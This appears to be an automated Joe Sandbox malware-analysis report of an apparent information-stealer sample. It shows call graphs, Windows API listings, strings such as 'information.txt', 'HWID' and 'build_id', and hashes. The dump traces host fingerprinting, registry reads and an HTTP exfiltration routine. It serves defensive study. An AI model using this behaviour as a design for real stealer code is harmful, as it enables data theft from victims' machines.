call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffd30 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffde0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffda0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffed0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2fff40 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300200 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2fffc0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2fffc0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffa50 lstrlen call 2ffa50 call 2ff810 call 2f1080 call 3042a0 call 2ff890 * 6
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FFB60: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFB6E
                                        • Part of subcall function 002FFB60: RtlAllocateHeap.NTDLL(00000000), ref: 002FFB75
                                        • Part of subcall function 002FFB60: GetLocalTime.KERNEL32(?), ref: 002FFB81
                                        • Part of subcall function 002FFB60: wsprintfA.USER32 ref: 002FFBAD
                                        • Part of subcall function 00300340: memset.MSVCRT ref: 00300365
                                        • Part of subcall function 00300340: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 00300382
                                        • Part of subcall function 00300340: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,00000000,000000FF), ref: 003003A4
                                        • Part of subcall function 00300340: RegCloseKey.ADVAPI32(?), ref: 003003AE
                                        • Part of subcall function 00300340: CharToOemA.USER32(00000000,?), ref: 003003C2
                                        • Part of subcall function 003003E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 003003EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 00300420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0030043C
                                        • Part of subcall function 00300420: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00300475
                                        • Part of subcall function 00300420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003004BF
                                        • Part of subcall function 00300420: RtlAllocateHeap.NTDLL(00000000), ref: 003004C6
                                      • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00313684,00000000,?,00000000,00000000,003101E9), ref: 00304728
                                        • Part of subcall function 00301090: OpenProcess.KERNEL32(00000410,00000000,?), ref: 003010A5
                                        • Part of subcall function 00301090: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003010C0
                                        • Part of subcall function 00301090: CloseHandle.KERNEL32(00000000), ref: 003010C7
                                        • Part of subcall function 003005A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003005B5
                                        • Part of subcall function 003005A0: RtlAllocateHeap.NTDLL(00000000), ref: 003005BC
                                        • Part of subcall function 00300900: CoInitializeEx.OLE32(00000000,00000000), ref: 00300928
                                        • Part of subcall function 00300900: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00300939
                                        • Part of subcall function 00300900: CoCreateInstance.COMBASE(003149C0,00000000,00000001,003148F0,?), ref: 00300953
                                        • Part of subcall function 00300900: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0030098C
                                        • Part of subcall function 00300900: VariantInit.OLEAUT32(?), ref: 003009E3
                                        • Part of subcall function 002FFB20: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFB2C
                                        • Part of subcall function 002FFB20: RtlAllocateHeap.NTDLL(00000000), ref: 002FFB33
                                        • Part of subcall function 002FFB20: GetComputerNameA.KERNEL32(00000000,?), ref: 002FFB47
                                        • Part of subcall function 002FFAE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFAEC
                                        • Part of subcall function 002FFAE0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFAF3
                                        • Part of subcall function 002FFAE0: GetUserNameA.ADVAPI32(00000000,?), ref: 002FFB07
                                        • Part of subcall function 003002C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00300300
                                        • Part of subcall function 003002C0: RtlAllocateHeap.NTDLL(00000000), ref: 00300307
                                        • Part of subcall function 003002C0: wsprintfA.USER32 ref: 00300317
                                        • Part of subcall function 002FFC30: GetKeyboardLayoutList.USER32(00000000,00000000,003101E9), ref: 002FFC4D
                                        • Part of subcall function 002FFC30: LocalAlloc.KERNEL32(00000040,00000000), ref: 002FFC5F
                                        • Part of subcall function 002FFC30: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002FFC69
                                        • Part of subcall function 002FFC30: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002FFC93
                                        • Part of subcall function 002FFC30: LocalFree.KERNEL32(00000000), ref: 002FFD16
                                        • Part of subcall function 002FFBC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFBD1
                                        • Part of subcall function 002FFBC0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFBD8
                                        • Part of subcall function 002FFBC0: GetTimeZoneInformation.KERNEL32(?), ref: 002FFBE7
                                        • Part of subcall function 002FFBC0: wsprintfA.USER32 ref: 002FFC12
                                        • Part of subcall function 002FFD30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFD45
                                        • Part of subcall function 002FFD30: RtlAllocateHeap.NTDLL(00000000), ref: 002FFD4C
                                        • Part of subcall function 002FFD30: RegOpenKeyExA.KERNEL32(80000002,02F357B8,00000000,00020119,?), ref: 002FFD6B
                                        • Part of subcall function 002FFD30: RegQueryValueExA.KERNEL32(?,02F45660,00000000,00000000,00000000,000000FF), ref: 002FFD86
                                        • Part of subcall function 002FFD30: RegCloseKey.ADVAPI32(?), ref: 002FFD90
                                        • Part of subcall function 002FFDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE02
                                        • Part of subcall function 002FFDE0: GetLastError.KERNEL32 ref: 002FFE10
                                        • Part of subcall function 002FFDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE48
                                        • Part of subcall function 002FFDE0: wsprintfA.USER32 ref: 002FFE92
                                        • Part of subcall function 002FFDA0: GetSystemInfo.KERNEL32(?), ref: 002FFDAD
                                        • Part of subcall function 002FFDA0: wsprintfA.USER32 ref: 002FFDC3
                                        • Part of subcall function 002FFED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFEDE
                                        • Part of subcall function 002FFED0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFEE5
                                        • Part of subcall function 002FFED0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 002FFF05
                                        • Part of subcall function 002FFED0: wsprintfA.USER32 ref: 002FFF2B
                                        • Part of subcall function 00300200: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003101E9), ref: 00300228
                                        • Part of subcall function 00300200: Process32First.KERNEL32(00000000,00000128), ref: 00300238
                                        • Part of subcall function 00300200: Process32Next.KERNEL32(00000000,00000128), ref: 0030024A
                                        • Part of subcall function 00300200: Process32Next.KERNEL32(00000000,00000128), ref: 0030029E
                                        • Part of subcall function 00300200: CloseHandle.KERNEL32(00000000), ref: 003002A9
                                        • Part of subcall function 002FFFC0: RegOpenKeyExA.KERNEL32(?,02F3E7E8,00000000,00020019,?,003101E9), ref: 00300009
                                        • Part of subcall function 002FFFC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00300052
                                        • Part of subcall function 002FFFC0: wsprintfA.USER32 ref: 0030007C
                                        • Part of subcall function 002FFFC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0030009A
                                        • Part of subcall function 002FFFC0: RegQueryValueExA.KERNEL32(00000000,02F45198,00000000,000F003F,?,00000400), ref: 003000CA
                                        • Part of subcall function 002FFFC0: lstrlen.KERNEL32(?), ref: 003000DF
                                        • Part of subcall function 002FFFC0: RegQueryValueExA.KERNEL32(00000000,02F45348,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00313408), ref: 00300156
                                      • lstrlen.KERNEL32(00000000,00000000,?,00313684,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00304F07
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$Allocate$wsprintf$Open$CloseInformationQueryValuelstrcpy$CreateLocalNameProcess32lstrlen$CurrentHandleInfoInitializeKeyboardLayoutListLogicalNextProcessorTimelstrcat$AllocBlanketCharComputerDirectoryEnumErrorFileFirstFreeGlobalInitInstanceLastLocaleMemoryModuleObjectProfileProxySecuritySingleSleepSnapshotStatusSystemThreadToolhelp32UserVariantVolumeWaitWindowsZonememset
                                      • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                      • API String ID: 1720495592-1014693891
                                      • Opcode ID: 661066760e71eb0921f2ecd812e2a74e0a55fa76a54a067c4fec919248921aed
                                      • Instruction ID: 4323be8c634ef5c2a6c949ec318fd04890d0845ae3ff71736ca4b4c5f03c9a06
                                      • Opcode Fuzzy Hash: 661066760e71eb0921f2ecd812e2a74e0a55fa76a54a067c4fec919248921aed
                                      • Instruction Fuzzy Hash: EF626172C2010C6EDB49F7A0DA62DFEF3789E14780B604279E61271191EF717B59CE64

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1795 2f5bb0-2f5c5f call 2ff850 call 2f3d70 call 2ff810 * 5 call 2ffa50 InternetOpenA StrCmpCA 1812 2f5c64-2f5c66 1795->1812 1813 2f5c61 1795->1813 1814 2f5c6c-2f5daa call 300b80 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff940 call 2ff8f0 call 2ff890 * 2 InternetConnectA 1812->1814 1815 2f6246-2f6267 InternetCloseHandle call 2ffa50 call 2f6cd0 1812->1815 1813->1812 1901 2f6243 1814->1901 1902 2f5db0-2f5de3 HttpOpenRequestA 1814->1902 1825 2f6269-2f628f call 2ff8a0 call 2ff9a0 call 2ff8f0 call 2ff890 1815->1825 1826 2f6294-2f62fa call 300ab0 * 2 call 2ff890 * 9 1815->1826 1825->1826 1901->1815 1903 2f6239-2f6240 InternetCloseHandle 1902->1903 1904 2f5de9-2f5deb 1902->1904 1903->1901 1905 2f5ded-2f5dfd InternetSetOptionA 1904->1905 1906 2f5e03-2f61d8 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2f1ed0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff940 call 2ff8f0 call 2ff890 call 2ffa50 lstrlen call 2ffa50 lstrlen GetProcessHeap RtlAllocateHeap call 2ffa50 lstrlen call 2ffa50 memcpy call 2ffa50 lstrlen call 2ffa50 * 2 lstrlen memcpy call 2ffa50 lstrlen call 2ffa50 HttpSendRequestA InternetReadFile 1904->1906 1905->1906 2065 2f622f-2f6236 InternetCloseHandle 1906->2065 2066 2f61da 1906->2066 2065->1903 2067 2f61e0-2f61e5 2066->2067 2067->2065 2068 2f61e7-2f622d call 2ff9a0 call 2ff8f0 call 2ff890 InternetReadFile 2067->2068 2068->2065 2068->2067
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5C3C
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F5C57
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F5D9D
                                      • HttpOpenRequestA.WININET(00000000,02F431B8,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F5DD9
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,02F34F90,00000000,?,00313358), ref: 002F611D
                                      • lstrlen.KERNEL32(00000000), ref: 002F612E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002F6139
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F6140
                                      • lstrlen.KERNEL32(00000000), ref: 002F6151
                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 002F6162
                                      • lstrlen.KERNEL32(00000000), ref: 002F6173
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F618C
                                      • memcpy.MSVCRT(00000000), ref: 002F6195
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F61A8
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002F61B9
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 002F61D0
                                      • InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 002F6225
                                      • InternetCloseHandle.WININET(00000000), ref: 002F6230
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F5DFD
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • InternetCloseHandle.WININET(00000000), ref: 002F623A
                                      • InternetCloseHandle.WININET(00000000), ref: 002F6247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocateConnectCrackOptionProcessSend
                                      • String ID: "$------$build_id$mode
                                      • API String ID: 2649202363-3829489455
                                      • Opcode ID: 54909c62508315c5f1c5befd3af8f731fbbdb6dd89638171f4717369e6398c85
                                      • Instruction ID: 4a528d6c912ba76b7bd13b3373093673df7c30365515ea815b7a76e3a4c13a08
                                      • Opcode Fuzzy Hash: 54909c62508315c5f1c5befd3af8f731fbbdb6dd89638171f4717369e6398c85
                                      • Instruction Fuzzy Hash: 6822317282010DAEDB45EBA0CD96EFEF778AF14780F544178F60262191EF706A59CF64

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • RegOpenKeyExA.KERNEL32(?,02F3E7E8,00000000,00020019,?,003101E9), ref: 00300009
                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00300052
                                      • wsprintfA.USER32 ref: 0030007C
                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0030009A
                                      • RegQueryValueExA.KERNEL32(00000000,02F45198,00000000,000F003F,?,00000400), ref: 003000CA
                                      • lstrlen.KERNEL32(?), ref: 003000DF
                                      • RegQueryValueExA.KERNEL32(00000000,02F45348,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00313408), ref: 00300156
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 1989970852-3278919252
                                      • Opcode ID: 7e7713b99f5da6c6d08b28240881720df8e8653adbedbee69307aef14085a220
                                      • Instruction ID: 9c1c5bbf29e7189524c849e915bd49f8bc2af86fb627856cda3b1f002e98c319
                                      • Opcode Fuzzy Hash: 7e7713b99f5da6c6d08b28240881720df8e8653adbedbee69307aef14085a220
                                      • Instruction Fuzzy Hash: 5D611A7191110DABDB59DB90CC95FEEB77CEF54740F008168F605A3290EB706A4ACFA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2251 2f43e0-2f443c call 2ff850 call 2f3d70 GetProcessHeap RtlAllocateHeap call 2ffa50 2257 2f4441-2f4462 InternetOpenA StrCmpCA 2251->2257 2258 2f4467-2f4469 2257->2258 2259 2f4464 2257->2259 2260 2f446f-2f448f InternetConnectA 2258->2260 2261 2f45aa-2f45cc InternetCloseHandle call 2ff890 * 2 2258->2261 2259->2258 2262 2f4495-2f44c6 HttpOpenRequestA 2260->2262 2263 2f45a3-2f45a4 InternetCloseHandle 2260->2263 2265 2f44cc-2f44ce 2262->2265 2266 2f4596-2f45a0 InternetCloseHandle 2262->2266 2263->2261 2268 2f44e6-2f4516 HttpSendRequestA HttpQueryInfoA 2265->2268 2269 2f44d0-2f44e0 InternetSetOptionA 2265->2269 2266->2263 2272 2f4518-2f4535 call 2ff890 * 2 2268->2272 2273 2f4536-2f454a call 300a80 2268->2273 2269->2268 2273->2272 2278 2f454c-2f454e 2273->2278 2278->2266 2280 2f4550-2f4553 2278->2280 2280->2266 2282 2f4555-2f4571 InternetReadFile 2280->2282 2282->2266 2283 2f4573-2f4590 call 300b00 2282->2283 2286 2f4592-2f4594 2283->2286 2286->2266 2286->2282
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002F441C
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F4423
                                      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F4442
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F445A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F4482
                                      • HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F44BC
